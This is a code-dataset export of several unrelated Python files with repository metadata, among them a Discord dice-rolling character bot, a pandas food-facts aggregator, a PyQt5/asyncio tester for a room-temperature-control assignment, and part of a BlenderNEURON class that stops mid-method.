"-pix_fmt", "yuv420p", args.output
], stdin=p_track.stdout)
p_track.stdout.close()
p_decode.wait()
p_track.wait()
p_encode.wait()
| 33.22973 | 125 | 0.646198 | 338 | 2,459 | 4.56213 | 0.387574 | 0.023346 | 0.02594 | 0.028534 | 0.226329 | 0.160182 | 0.146563 | 0.098573 | 0.06096 | 0 | 0 | 0.007948 | 0.181375 | 2,459 | 73 | 126 | 33.684932 | 0.758073 | 0.134608 | 0 | 0 | 0 | 0 | 0.281073 | 0.083804 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.037037 | 0 | 0.111111 | 0.018519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf85e87ae27dbc7518de916f0330cd2331da96f8 | 1,698 | py | Python | resources/logforms/mdtex_fiction_yml_pdf.py | exposit/pythia-oracle | 60e4e806c9ed1627f2649822ab1901d28933daac | [
"MIT"
] | 32 | 2016-08-27T01:31:42.000Z | 2022-03-21T08:59:28.000Z | resources/logforms/mdtex_fiction_yml_pdf.py | exposit/pythia-oracle | 60e4e806c9ed1627f2649822ab1901d28933daac | [
"MIT"
] | 3 | 2016-08-27T00:51:47.000Z | 2019-08-26T13:23:04.000Z | resources/logforms/mdtex_fiction_yml_pdf.py | exposit/pythia-oracle | 60e4e806c9ed1627f2649822ab1901d28933daac | [
"MIT"
] | 10 | 2016-08-28T14:14:41.000Z | 2021-03-18T03:24:22.000Z | #!/usr/bin/env python
#-*- coding: utf-8 -*-
##---------------------------------------------------------------------------------------
#
# Markdown
# fiction: includes only fiction blocks
# yml: uses a yaml Front Matter from config.txt
# pdf: is ready to convert to pdf (or latex) via pandoc
#
##---------------------------------------------------------------------------------------
import imports
from imports import *
import config
def exclude():
return False
def makeLogFile(self):
logfile = config.curr_game_dir + "logs" + os.sep + "fiction_yml_pdf.md"
textArray, textStatusArray = getSourceMaterial()
YAML = config.yaml_for_pdf
fictionStatusList = ["plain", "italic", "bold", "bold_italic", "color1", "color2"]
result = ""
for item in textArray:
ti = textArray.index(item)
item = item.rstrip()
if textStatusArray[ti] in fictionStatusList:
result = result + "\n"
prefix_escapes = [ ['[i][b]', '\\textit{\\textbf{' ], ['[b][i]', '\\textbf{\\textit{'], ['[i]', '\\textit{'], ['[b]', '\\textbf{'] ]
suffix_escapes = [ ['[/i][/b]', '}}'], ['[/b][/i]', '}}'], ['[/i]', '}'], ['[/b]', '}'] ]
for esc in prefix_escapes:
if esc[0] in item:
item = item.replace(esc[0], esc[1] + "\plain{" )
for esc in suffix_escapes:
if esc[0] in item:
item = item.replace(esc[0], "}" + esc[1] )
result = result + "\n" + item
result = YAML + parseMarkup(result)
result = result.lstrip()
with open(logfile, "w") as log_file:
log_file.write(result.encode('utf-8'))
| 31.444444 | 144 | 0.478799 | 177 | 1,698 | 4.519774 | 0.480226 | 0.06 | 0.045 | 0.0325 | 0.105 | 0.105 | 0.105 | 0.105 | 0.105 | 0.105 | 0 | 0.007893 | 0.253828 | 1,698 | 53 | 145 | 32.037736 | 0.62352 | 0.220848 | 0 | 0.068966 | 0 | 0 | 0.1373 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.103448 | 0.034483 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf89b25245266126dba56862b20f23c850ea62d7 | 2,397 | py | Python | process.py | Swathisree/d3_Food_facts | cde6c2c02b6a8e38080f8f2fbab9d39864c23cd0 | [
"OML"
] | null | null | null | process.py | Swathisree/d3_Food_facts | cde6c2c02b6a8e38080f8f2fbab9d39864c23cd0 | [
"OML"
] | null | null | null | process.py | Swathisree/d3_Food_facts | cde6c2c02b6a8e38080f8f2fbab9d39864c23cd0 | [
"OML"
] | null | null | null | import pandas as pd
import json
countries = pd.read_csv('tsv/products_countries.tsv', sep='\t')
categories = pd.read_csv('tsv/products_categories_full.tsv', sep='\t')
products = pd.read_csv('tsv/products.tsv', sep='\t')
combined = pd.merge(left = products, right = categories, on='code' )
combined = pd.merge(left=combined, right=countries, on='code')
def get_top_countries(df,food_type, top=10):
return list(df.groupby('country')[food_type].sum().sort_values( ascending=False).index)[:top]
def get_top_values(df, food_type, top=10):
return list(df.groupby('country')[food_type].sum().sort_values( ascending=False))[:top]
def get_ingredient_data(data, ing):
return combined.groupby(['country','category'])[ing, 'category', 'country'].sum().sort_values(by=ing, ascending=False)
def get_plot_format_data(combined,ing, blue):
country_list = get_top_countries(combined, ing)
value_list = get_top_values(combined, ing)
#print(value_list)
details={}
for country in country_list:
if country not in details.keys():
details[country]=[]
for value in blue.index:
if country == value[0]:
if len(details[country])<7:
details[country].append({value[1]:blue.loc[value][ing]})
result =[]
counter = 0
for key, value in details.items():
freq_dict ={}
legend={}
for i, dt in enumerate(value):
name = 'cat'+str(i+1)
for x in list(dt.keys()):
legend[name] = truncate_long_cats(x)
freq_dict[name] = list(dt.values())[0]
#print(value_list[counter])
result.append({"State": key, 'total':value_list[counter], "freq":freq_dict , "legend": legend})
counter+=1
return result
def truncate_long_cats(cats):
c = cats.split("-")
if len(c)>2:
c = [c[0], c[-1]]
res= "...".join(c)
else:
res = "-".join(c)
return res[:15]
# list the integredients available
ingredients = ['alcohol_100g', 'sugars_100g', 'salt_100g', 'cholesterol_100g', 'fruits-vegetables-nuts_100g']
final = {}
for ing in ingredients:
blue = get_ingredient_data(combined, ing)
data = get_plot_format_data(combined,ing, blue)
final[ing.split('_')[0]]= data
# save json
with open('final2.json','w') as f:
json.dump(final, f)
| 29.231707 | 122 | 0.622445 | 326 | 2,397 | 4.423313 | 0.322086 | 0.038141 | 0.018724 | 0.024965 | 0.191401 | 0.149792 | 0.149792 | 0.105409 | 0.105409 | 0.105409 | 0 | 0.017666 | 0.220693 | 2,397 | 81 | 123 | 29.592593 | 0.754283 | 0.035878 | 0 | 0 | 0 | 0 | 0.107499 | 0.036844 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09434 | false | 0 | 0.037736 | 0.056604 | 0.226415 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf8a442f7555ff5867a989ed32bf9d07c2238f69 | 10,207 | py | Python | src/bot.py | jannikbusse/DSA_BOT | 87b3972235e5c7b77ca24c8ab34d6d045b8dfeac | [
"MIT"
] | null | null | null | src/bot.py | jannikbusse/DSA_BOT | 87b3972235e5c7b77ca24c8ab34d6d045b8dfeac | [
"MIT"
] | 1 | 2020-11-09T23:29:15.000Z | 2020-11-09T23:29:15.000Z | src/bot.py | jannikbusse/DSA_BOT | 87b3972235e5c7b77ca24c8ab34d6d045b8dfeac | [
"MIT"
] | null | null | null | import discord
import queue
import db
import disc_api
import glob_vars
import time, threading
import dice
import helper
import logging
import re
stats = ["mu","kl","in","ch","ff","ge", "ko", "kk"] #careful: in is int in the db!
def is_int(s):
try:
int(s)
return True
except ValueError:
return False
def received_msg(message):
parse_msg(message)
def parse_attribute_input(s):
b = re.match(r'\A[a-zA-Z]+\([a-zA-Z]+,[a-zA-Z]+,[a-zA-Z]+\)\Z', s)
if b:
at = re.search(r'([a-zA-Z]*?)\(', s).group(1)
res = re.search(r'\((.*?)\)',s).group(1)
res = res.split(',')
return(at,res[0], res[1], res[2])
if re.match(r'\A[a-zA-Z | - | _]+\Z',s):
return (s, "","","")
return None
def send_message(channel,content):
n = 1600
msgs = [content[i:i+n] for i in range(0, len(content), n)]
for msg in msgs:
glob_vars.send_message(channel, msg)
time.sleep(0.1)
def command_register(message, args):
if(len(args) < 1):
send_message(message.channel, "Too few arguments!")
return
charname = args[0]
charNumber = len(db.db_get_char_list(message.author))
if charNumber >= glob_vars.MAX_CHAR_COUNT:
send_message(message.channel, "You have too many characters!\nYou can delete one by using the 'delete' command")
return
success = db.db_register_char(message.author, charname)
send_message(message.channel,success)
def command_chars(message):
chars = db.db_get_char_list(message.author)
selected = db.get_selected_char(message.author)
res = ""
for char in chars:
if char == selected:
res +="=>"
res = res + char.capitalize() + "\n"
if res == "":
res = "No chars in database!"
msg = "You currently have "+ str(len(chars))+"/"+str(glob_vars.MAX_CHAR_COUNT) +" char(s)! \n\n"
send_message(message.channel,msg + res)
def command_char(message, args):
charname = ""
selected_char = db.get_selected_char(message.author)
if selected_char == None:
send_message(message.channel, "User has no character!")
return
if len(args) < 1:
charname = selected_char
else:
charname = args[0]
if not db.check_char_exists(message.author, charname):
send_message(message.channel, "This character could not be found in the database!")
return
charEntry, attributeList = db.db_get_char(charname, message.author)
charEntry = charEntry[0]
stat = []
for s in glob_vars.stats:
stat.append(helper.make_str_two_digits(str(helper.attribute_value_from_list(attributeList, s))))
header = "-------------**"+ charname.capitalize() +"**-----------------"
toprow = "| mu | kl | in | ch | ff | ge | ko | kk |"
botrow = "| " +stat[0] +" | " +stat[1]+" | " +stat[2]+" | " +stat[3]+" | " +stat[4]+" | " +stat[5]+" | " +stat[6]+" | " +stat[7]+" |\n\n"
attributes_print = "**Attributes** ("+ str(db.get_attribute_number(charname, message.author))+"/"+ str(glob_vars.MAX_ATTRIBUTE_COUNT) +"): \n"
for attribute in filter(lambda x: not x[0] in glob_vars.stats, attributeList):
dependency_print = ""
if not attribute[2] == "":
dependency_print = "("+attribute[2]+","+attribute[3]+","+attribute[4]+")"
attributes_print += str(attribute[0]) + dependency_print+" " + str(attribute[1]) + "\n"
send_message(message.channel, header+"\n"+toprow+"\n"+botrow+ attributes_print)
def command_delete(message, args):
if(len(args) < 1):
send_message(message.channel, "too few arguments!")
return
charname = args[0]
success = db.db_remove_char(charname, message.author)
send_message(message.channel, success)
def command_update(message, args):
out = ""
if not db.check_user_has_char(message.author):
send_message(message.channel, "User has no character!")
return
for i in range(len(args))[::2]:
s = parse_attribute_input(args[i])
if s == None:
send_message(message.channel, "Oops, wrong arguments for " + args[i])
return
if i+1 < len(args):
if not is_int(args[i+1]):
out += "arg for **"+ s[0] +"** has to be an integer!\n"
continue
attributeValue = int(args[i+1])
out += db.db_update_attribute(message.author, s, attributeValue) + "\n"#first param is "attribute"
else:
send_message(message.channel, "Oops, too few arguments for " + s[0])
return
send_message(message.channel, out)
def command_selected(message):
selected = db.get_selected_char(message.author)
if selected == None:
send_message(message.channel, "User has no character!")
return
send_message(message.channel, "Selected char for user " + str(message.author) + ": " + selected)
def command_select(message, args):
if(len(args) < 1):
send_message(message.channel, "too few arguments!")
return
charname = args[0]
success = db.db_select_char(message.author, charname)
send_message(message.channel, success)
def command_roll(message, s, args):
s = helper.remove_prefix(s, "roll")
s = helper.remove_prefix(s, "r")
if(len(args) < 1):
s = "w20"
res = dice.simulate_dice(s)
send_message(message.channel, res)
def command_rd(message, args):
if len(args) != 3 and len(args) != 4 and len(args) != 1:
send_message(message.channel, "Wrong syntax!\n/rd <stat> <stat> <stat> <talent - optional>")
return
if not db.check_user_has_char(message.author):
send_message(message.channel, "User has no character!")
return
cID = db.get_selected_char(message.author)
charEntry = db.db_get_char(cID, message.author)
if len(args) == 1:
attribute = db.get_attribute(cID,message.author, args[0])
if attribute == None:
send_message(message.channel, "Oops, this attribute was not found on **"+cID +"**" )
return
if(attribute[6] == "" or attribute[4] == "" or attribute[5] == "" ):
send_message(message.channel, "Oops, **"+attribute[2]+"** has no dependencies at the moment!" )
return
args[0] = attribute[4]
args.append(attribute[5])
args.append(attribute[6])
args.append(attribute[2])
res = dice.roll_dsa(args, charEntry)
send_message(message.channel, res)
def command_set_prefix(message, args):
if(len(args) < 1):
send_message(message.channel, "too few arguments!")
return
success = db.db_set_prefix(message.guild, args[0])
send_message(message.channel, success)
def command_remove(message, args):
selected = db.get_selected_char(message.author)
if selected == None:
send_message(message.channel, "User has no character selected!")
return
out = ""
for arg in args:
if arg not in glob_vars.stats:
out += db.db_remove_attribute(selected, message.author, arg) + "\n"
send_message(message.channel, out)
def command_rename(message, args):#FIX DATABASE FIRST!!
send_message(message.channel, "This function is not available because my database has been set up very poorly!")
return
if len(args) < 2:
send_message(message.channel, "Too few arguments!")
currentName = args[0]
newName = args[1]
if not db.check_char_exists(message.author, currentName):
send_message(message.channel, currentName + " could not be found!")
return
if db.check_char_exists(message.author, newName):
send_message(message.channel, newName + " is already in use by one of your characters!")
return
success = db.db_rename_character(currentName, message.author, newName)
send_message(message.channel, success)
def command_help(message, args):
send_message(message.channel, glob_vars.HELP_MESSAGE)
def parse_msg(message):
prefix = db.db_get_prefix(message.guild)
if str(message.content) == "prefix":
send_message(message.channel, "The prefix for this server is: "+ prefix)
return
if not message.content.startswith(prefix):
return
s = message.content.lower()
s = helper.remove_prefix(s, prefix)
args = s.split()[1:]
#send_message( message.channel, "parsing .. \"" + message.content + "\" ...") # debug message
if(s.startswith("register")): #/register <charname>
command_register(message, args)
elif(s.startswith("chars")): #/chars
command_chars(message)
elif(s.startswith("char")): #/char <charname - optional>
command_char(message, args)
elif(s.startswith("delete")):#/delete <charname>
command_delete(message, args)
elif(s.startswith("remove")):
command_remove(message, args)
elif(s.startswith("update")):#/update in <int> ch <y> ...
command_update(message, args)
elif(s.startswith("selected")):#/select <charname>
command_selected(message)
elif(s.startswith("select")):
command_select(message,args)
elif(s.startswith("rd ")):
command_rd(message, args)
elif(s.startswith("r")):
command_roll(message,s ,args)
elif(s.startswith("prefix")):
command_set_prefix(message, args)
elif(s.startswith("rename")):#FIX DATABASE FIRST!!
command_rename(message, args)
elif(s.startswith("help")):
command_help(message, args)
def check_queue():
try:
send_item = glob_vars.bot_receive_queue.get(False)
if send_item.content == "exit":
glob_vars.terminate = True
received_msg(send_item)
except queue.Empty:
send_item = None
def start_bot():
logging.info("Started bot!")
db.init_db()
while(not glob_vars.terminate):
time.sleep(0.05)
check_queue()
logging.basicConfig(level=logging.INFO, filename="log.txt", filemode="a+",
format="%(asctime)-15s %(levelname)-8s %(message)s")
x = threading.Thread(target=start_bot)
x.start()
disc_api.start_api() | 33.13961 | 146 | 0.621828 | 1,335 | 10,207 | 4.619476 | 0.161798 | 0.065996 | 0.102157 | 0.141884 | 0.385601 | 0.280688 | 0.260256 | 0.16864 | 0.145614 | 0.143019 | 0 | 0.009067 | 0.232781 | 10,207 | 308 | 147 | 33.13961 | 0.778445 | 0.030371 | 0 | 0.25 | 0 | 0.004098 | 0.124621 | 0.004653 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081967 | false | 0 | 0.040984 | 0 | 0.22541 | 0.020492 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf8c232211d8a9e8eb6f6025337e301b97fed78a | 12,943 | py | Python | acms-pass/t.py | EtoDemerzel0427/Misc-Notes | d885bdb7a5e1caa9db0b9ee70695dff1a17b3d26 | [
"MIT"
] | null | null | null | acms-pass/t.py | EtoDemerzel0427/Misc-Notes | d885bdb7a5e1caa9db0b9ee70695dff1a17b3d26 | [
"MIT"
] | null | null | null | acms-pass/t.py | EtoDemerzel0427/Misc-Notes | d885bdb7a5e1caa9db0b9ee70695dff1a17b3d26 | [
"MIT"
] | null | null | null | import argparse
import asyncio
import random
import signal
import sys
import time
import traceback
import yaml
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtNetwork import *
from PyQt5.QtWidgets import *
from b4 import *
class B4:
conf = dict()
groups = dict()
room_names = 's123'
def __init__(self):
pass
b4 = B4()
def scene_add(scene, tick, kind, role, action):
if tick in scene:
if kind in scene[tick]:
if role in scene[tick][kind]:
scene[tick][kind][role].add(action)
else:
scene[tick][kind][role] = {action}
else:
scene[tick][kind] = {role: {action}}
else:
scene[tick] = {kind: {role: {action}}}
def scene_add_action(scene, tick, role, action):
scene_add(scene, tick, 'actions', role, action)
def scene_add_expect(scene, tick, role, expect):
scene_add(scene, tick, 'expects', role, expect)
def scene_create():
scene = dict()
random.seed()
for room_name in b4.room_names[1:]:
it = random.randint(b4.conf['it'][0][0], b4.conf['it'][0][1])
if room_name > '2':
it = random.randint(b4.conf['it'][1][0], b4.conf['it'][1][1])
tc = random.randint(1, 1)
tt = random.randint(b4.conf['tt'][0], b4.conf['tt'][1])
w = random.randint(1, 3)
scene_add_action(scene, tc, room_name, f'it={it} tt={tt} w={w} tc={tc} ts={b4.conf["ts"]}')
scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} t={it}')
temp_step = 1 if it < tt else -1
for t in range(it + temp_step, tt + temp_step, temp_step):
tc = tc + (4 - w)
scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} t={t}')
temp_diff = abs(tt - it)
tick_keep_tt = random.randint(10, 20)
bill = temp_diff * (1 + tick_keep_tt)
for tc in range(tc, tc + tick_keep_tt):
scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} t={t}')
tc = tc + 1
scene_add_action(scene, tc, room_name, f'w=0 tc={tc}')
scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} w=0')
tc = random.randint(tc + 4, tc + 5)
scene_add_action(scene, tc, 's', f'b={room_name} tc={tc}')
scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} b={bill}')
scene = {k: scene[k] for k in sorted(scene)}
# for tick, actions in scene.items():
# print(f'{tick}')
# for room_name, cmd in actions.items():
# print(f' "{room_name}" {cmd}')
return scene
async def scene_execute(scene, group_name, happens_all, log_prefix):
prev_tick = 0
for tick in scene.keys():
await asyncio.sleep((tick - prev_tick) * b4.conf['ts'])
prev_tick = tick
log.info(f'{log_prefix} tc {tick}')
if 'actions' in scene[tick]:
actions = scene[tick]['actions']
log.info(f'{log_prefix} actions {actions}')
for room_name, commands in actions.items():
for command in commands:
send_line(b4.groups[group_name]['rooms'][room_name]['w'], command)
if 'expects' in scene[tick]:
expects = scene[tick]['expects']['s']
happens = happens_all.get(tick - 1, None)
log.info(f'{log_prefix} expects {expects}')
log.info(f'{log_prefix} happens {happens}')
if not happens:
raise B4Error(f'e=ExpectHappenNone')
for expect in expects:
expect_dict = dict_from_line(expect)
found = False
for happen in happens:
happen_dict = dict_from_line(happen)
if set(expect_dict.items()).issubset(set(happen_dict.items())):
found = True
break
if not found:
raise B4Error(f'e=ExpectHappenMiss')
b4.groups[group_name]['pass'] = True
b4.udp_transport.sendto(f'g={group_name} p=1'.encode('utf8'))
async def recv_task(r, group_name, happens_all, log_prefix):
while True:
kv_dict = await recv_line(r)
log.info(f'{log_prefix} recv {kv_dict} time={time.time()}')
tc = kv_dict.get('tc', None)
if not tc:
raise B4Error(f'e=LackTickCount')
line = ' '.join([f'{k}={v}' for (k, v) in kv_dict.items()])
tc = int(tc)
if tc in happens_all:
happens_all[tc].add(line)
else:
happens_all[tc] = {line}
b4.udp_transport.sendto(f'g={group_name} {line}'.encode('utf8'))
async def t_do_testee(r, w):
group_name, room_name, rooms, room = None, None, None, None
peer_host, peer_port, *_ = w.get_extra_info('peername')
log_prefix = f'{peer_host:>15}:{peer_port:>5}'
try:
group_key, room_name = await recv_line(r, 'k', 'r')
group_name = b4.conf['k'].get(group_key, None)
if not group_name:
raise B4Error(f'e=ErrorKey', False)
log_prefix = f'{log_prefix} g={group_name}'
group = b4.groups[group_name]
if group['pass']:
raise B4Error(f'e=AlreadyPass')
if not room_name in list(b4.room_names):
raise B4Error(f'e=ErrorRoom')
log_prefix = f'{log_prefix} r={room_name}'
rooms = group['rooms']
if room_name in rooms:
raise B4Error(f'e=DuplicatedRoom')
log.info(f'{log_prefix} logined!')
send_line(w, f'e=0')
b4.udp_transport.sendto(f'g={group_name} r={room_name} c=1'.encode('utf8'))
room = rooms[room_name] = {'r': r, 'w': w}
if room_name != 's':
while True:
await recv_line(r)
log.info(f'{log_prefix} waiting i=1 ...')
await recv_line(r, 'i')
log.info(f'{log_prefix} test start!')
if len(rooms) < len(b4.room_names):
raise B4Error(f'e=LackRoom')
happens_all = dict()
task_scene = b4.loop.create_task(scene_execute(scene_create(), group_name, happens_all, log_prefix))
task_recv = b4.loop.create_task(recv_task(r, group_name, happens_all, log_prefix))
# done, pending = await asyncio.wait({task_scene, task_recv}, loop=b4.loop)
result = await asyncio.gather(task_scene, task_recv, loop=b4.loop)
except B4Error as e:
log.warning(f'{log_prefix} exc {e.args}')
send_line(w, e.args[0])
except Exception as e:
log.warning(f'{log_prefix} {e.args}')
finally:
if not room:
w.close()
else:
for room_name in rooms:
rooms[room_name]['w'].close()
b4.udp_transport.sendto(f'g={group_name} r={room_name} c=0'.encode('utf8'))
rooms.clear()
class BlockView(QPushButton):
styles = {'0': 'background:red; color:white', '1': 'background:lime; color:black',
'2': 'background:cyan; color:black', '3': 'background:yellow; color:black'}
def __init__(self, parent=None):
QPushButton.__init__(self, parent)
self.setStyleSheet(BlockView.styles['0'])
self.setEnabled(False)
class MainWindow(QDialog):
def __init__(self, parent=None):
super().__init__(parent, Qt.WindowStaysOnTopHint | Qt.WindowMinMaxButtonsHint)
# QDialog.__init__(self, parent, Qt.WindowStaysOnTopHint|Qt.WindowMinMaxButtonsHint)
# QDialog.__init__(self, parent, Qt.WindowCloseButtonHint|Qt.WindowStaysOnTopHint|Qt.WindowMinMaxButtonsHint)
self.setStyleSheet('*{font:Consolas}')
# self.setStyleSheet('*{font:10pt Consolas}')
mainLayout = QGridLayout()
self.groups = dict()
group_count = 0
for group_name in b4.group_names:
groupLayout = QVBoxLayout()
groupLayout.setSpacing(0)
groupLayout.setContentsMargins(0, 0, 0, 0)
groupNameWidget = BlockView(group_name)
roomNameWidget = BlockView('s')
rooms = {'s': [roomNameWidget]}
groupLayout.addWidget(groupNameWidget)
groupLayout.addWidget(roomNameWidget)
roomsLayout = QHBoxLayout()
for room_name in b4.room_names[1:]:
roomNameWidget = BlockView(room_name)
roomStateWidget = BlockView('------\n\n\n\n')
roomStateWidget.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding);
rooms[room_name] = [roomNameWidget, roomStateWidget]
roomLayout = QVBoxLayout()
roomLayout.addWidget(roomNameWidget)
roomLayout.addWidget(roomStateWidget)
roomsLayout.addLayout(roomLayout)
self.groups[group_name] = {'group': groupNameWidget, 'rooms': rooms}
groupLayout.addLayout(roomsLayout)
mainLayout.addLayout(groupLayout, group_count / 3, group_count % 3)
group_count = group_count + 1
self.setLayout(mainLayout)
self.move(923, 103)
self.udpSocket = QUdpSocket(self)
self.udpSocket.bind(QHostAddress.LocalHost, 8999)
self.udpSocket.readyRead.connect(self.udpReadyRead)
def keyPressEvent(self, event):
key = event.key()
if Qt.Key_Escape != key:
event.accept()
else:
event.ignore()
def moveEvent(self, event):
self.setWindowTitle(f'{self.pos()}')
event.accept()
def udpReadyRead(self):
while self.udpSocket.hasPendingDatagrams():
data, host, port = self.udpSocket.readDatagram(self.udpSocket.pendingDatagramSize())
data = data.decode('utf8').strip()
# log.debug(f'{data}')
kv_list = data.split()
kv_dict = dict()
for kv in kv_list:
k, v, = kv.split('=')
kv_dict[k] = v
group_name = kv_dict.get('g', None)
room_name = kv_dict.get('r', None)
conn_bool = kv_dict.get('c', None)
wind_speed = kv_dict.get('w', None)
pass_bool = kv_dict.get('p', None)
if pass_bool:
self.groups[group_name]['group'].setStyleSheet(BlockView.styles[pass_bool])
if 'c' in kv_dict:
self.groups[group_name]['rooms'][room_name][0].setStyleSheet(BlockView.styles[conn_bool])
if conn_bool == '0' and room_name != 's':
self.groups[group_name]['rooms'][room_name][1].setStyleSheet(BlockView.styles[conn_bool])
self.groups[group_name]['rooms'][room_name][1].setText('')
if 'w' in kv_dict:
wind_bool = '3' if wind_speed == '0' else '3'
self.groups[group_name]['rooms'][room_name][1].setStyleSheet(BlockView.styles[wind_bool])
kv_dict = {k: v for k, v in filter(lambda x: x[0] not in ('g', 'r'), kv_dict.items())}
state = '\n'.join([f'{k:>2}={v:>3}' for (k, v) in kv_dict.items()])
self.groups[group_name]['rooms'][room_name][1].setText(state)
def qt_main():
app = QApplication(sys.argv)
app.setQuitOnLastWindowClosed(False)
w = MainWindow()
w.show()
sys.exit(app.exec_())
async def async_main():
b4.udp_transport, b4.udp_protocol = await b4.loop.create_datagram_endpoint(lambda: asyncio.DatagramProtocol(),
local_addr=('127.0.0.1', 8998),
remote_addr=('127.0.0.1', 8999))
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal.SIG_DFL)
with open('t.yml') as f:
b4.conf = yaml.load(f.read(), Loader=yaml.FullLoader)
b4.conf['k'] = {v[0]: k for k, v in b4.conf['g'].items()}
b4.group_names = list(b4.conf['g'].keys())
b4.groups = {group_name: {'pass': None, 'rooms': dict()} for group_name in b4.group_names}
log.debug(f'{b4.conf["k"]} {b4.group_names}')
# udp datagram_point cannot used in win32 protocor event loop
# if sys.platform == 'win32': asyncio.set_event_loop(asyncio.ProactorEventLoop())
b4.loop = asyncio.get_event_loop()
b4.loop.run_until_complete(async_main())
coro = asyncio.start_server(t_do_testee, None, b4.conf['tester']['port'], loop=b4.loop)
server = b4.loop.run_until_complete(coro)
print(f'listening {server.sockets[0].getsockname()}')
b4.loop.run_in_executor(None, qt_main)
b4.loop.run_forever()
server.close()
b4.loop.run_untile_complete(server.wait_closed())
| 37.956012 | 118 | 0.565402 | 1,647 | 12,943 | 4.27201 | 0.175471 | 0.039795 | 0.017055 | 0.012507 | 0.273451 | 0.203525 | 0.183485 | 0.145111 | 0.120665 | 0.089966 | 0 | 0.019772 | 0.296608 | 12,943 | 340 | 119 | 38.067647 | 0.753076 | 0.047052 | 0 | 0.061069 | 0 | 0.003817 | 0.107328 | 0.005258 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041985 | false | 0.030534 | 0.049618 | 0 | 0.122137 | 0.003817 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf8ee76e1f64b536bad62c4443845e7dcf14d0c8 | 5,872 | py | Python | blenderneuron/blender/blendernode.py | Helveg/BlenderNEURON | 7297e6aa45722f35908b707d0020b0519a6bc60d | [
"MIT"
] | 19 | 2018-02-09T21:30:25.000Z | 2022-03-21T23:02:26.000Z | blenderneuron/blender/blendernode.py | Helveg/BlenderNEURON | 7297e6aa45722f35908b707d0020b0519a6bc60d | [
"MIT"
] | 30 | 2019-04-16T02:38:24.000Z | 2022-03-19T18:42:58.000Z | blenderneuron/blender/blendernode.py | Helveg/BlenderNEURON | 7297e6aa45722f35908b707d0020b0519a6bc60d | [
"MIT"
] | 5 | 2018-07-23T16:49:59.000Z | 2022-03-02T18:48:07.000Z | import bpy
from blenderneuron.blender.blenderroot import BlenderRoot
from blenderneuron.blender.blenderrootgroup import *
from blenderneuron.commnode import CommNode
class BlenderNode(CommNode):
def __init__(self, *args, **kwargs):
super(BlenderNode, self).__init__("Blender", *args, **kwargs)
@property
def ui_properties(self):
return bpy.data.scenes[0].BlenderNEURON
def add_group(self, name=None, include_groupless_roots=True):
self.update_root_index()
if name is None:
name = self.find_unique_group_name()
group = BlenderRootGroup(name, self)
# Attach group to node
self.groups[name] = group
# Add group to the UI list
group.add_to_UI()
if include_groupless_roots:
group.add_groupless_roots()
return group
def update_root_index(self):
# Keep track which roots have been removed from NRN
roots_to_delete = set(self.root_index.keys())
# Get the list of root sections from NEURON
try:
root_data = self.client.get_roots()
# Update new or existing root entries
for i, root_info in enumerate(root_data):
name = root_info["name"]
existing_root = self.root_index.get(name)
# Update existing root
if existing_root is not None:
existing_root.index = root_info["index"]
existing_root.name = root_info["name"]
# Don't remove roots that previously existed and are present
roots_to_delete.remove(name)
# Add a new root
else:
new_root = self.root_index[name] = BlenderRoot(
root_info["index"],
root_info["name"]
)
# Make sure it's listed as selectable in all groups
for group in self.groups.values():
new_root.add_to_UI_group(group.ui_group)
except ConnectionRefusedError:
root_data = []
finally:
# Delete removed roots
for name_to_delete in roots_to_delete:
self.root_index[name_to_delete].remove(node=self)
def find_unique_group_name(self):
i_name = len(self.groups.values())
while True:
name = "Group." + str(i_name).zfill(3)
if name in self.groups:
i_name += 1
else:
break
return name
def get_group_data_from_neuron(self, group_list):
# Convert blender groups to skeletal dicts (needed for XML rcp with NRN)
# These dicts contain basic information (e.g. no 3D data, activity)
blender_groups = self.get_group_dicts(group_list)
# Send a request to NRN for the selected groups
compressed = self.client.initialize_groups(blender_groups)
# Decompress the result
nrn_groups = self.decompress(compressed)
return nrn_groups
def import_groups_from_neuron(self, group_list):
nrn_groups = self.get_group_data_from_neuron(group_list)
# Update each blender node group with the data received from NRN
for nrn_group in nrn_groups:
node_group = self.groups[nrn_group["name"]]
print('Importing group: ' + node_group.name + ' from NEURON...')
# Remove any views of the cells
if node_group.view is not None:
